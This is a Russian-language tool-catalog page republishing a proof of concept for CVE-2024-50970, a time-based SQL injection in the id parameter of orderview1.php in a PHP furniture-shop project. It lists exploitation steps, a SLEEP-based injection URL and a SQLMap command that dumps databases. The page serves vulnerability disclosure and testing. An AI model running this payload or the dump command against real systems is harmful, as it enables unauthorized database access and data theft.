Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-50970 — Доказательство концепции, демонстрирующее SQL-инъекцию на основе времени в Itsourcecode Online Furniture Shopping Project 1.0 через параметр id в orderview1.php, включая шаги эксплуатации и команды SQLMap. | Kitploit
Инструменты/GitHubGitHub/akhlak2511/cve-2024-50970
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеБезопасность Баз Данных
GitHubakhlak2511/cve-2024-50970

CVE-2024-50970

Доказательство концепции, демонстрирующее SQL-инъекцию на основе времени в Itsourcecode Online Furniture Shopping Project 1.0 через параметр id в orderview1.php, включая шаги эксплуатации и команды SQLMap.

Репозиторий
51 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-50970

Описание

Уязвимость SQL-инъекции в файле orderview1.php проекта Itsourcecode Online Furniture Shopping Project 1.0 позволяет удалённым злоумышленникам выполнять произвольные SQL-команды через параметр id.

Тип уязвимости

SQL-инъекция

Производитель продукта

Itsourcecode

База кода затронутого продукта:

https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ – 1.0

Затронутый компонент:

Проект Itsourcecode Online Furniture Shopping v1.0 подвержен SQL-инъекции через параметр id на странице orderview1.php

Векторы атаки:

  1. Установите приложение локально, зарегистрируйте учётную запись и войдите в систему с помощью только что зарегистрированного аккаунта.
  2. Перейдите по следующему URL-адресу в вашем браузере:
http://localhost/nikos/orderview1.php?action=edit&id=1728835149
  • Внедрите SQL-полезную нагрузку: Измените параметр id в URL-адресе, включив в него time-based SQL-инъекцию. http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
  • Наблюдайте за ответом приложения: Страница должна загружаться заметно дольше (10 секунд) в случае успешной инъекции, что подтверждает уязвимость параметра id к SQL-инъекции.
  • Теперь используйте инструмент SQLMap для дальнейшей эксплуатации и дампа баз данных с помощью следующей команды: python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast
  • Ссылки:

    1. https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
    2. https://owasp.org/www-community/attacks/SQL_Injection
    Скачать инструмент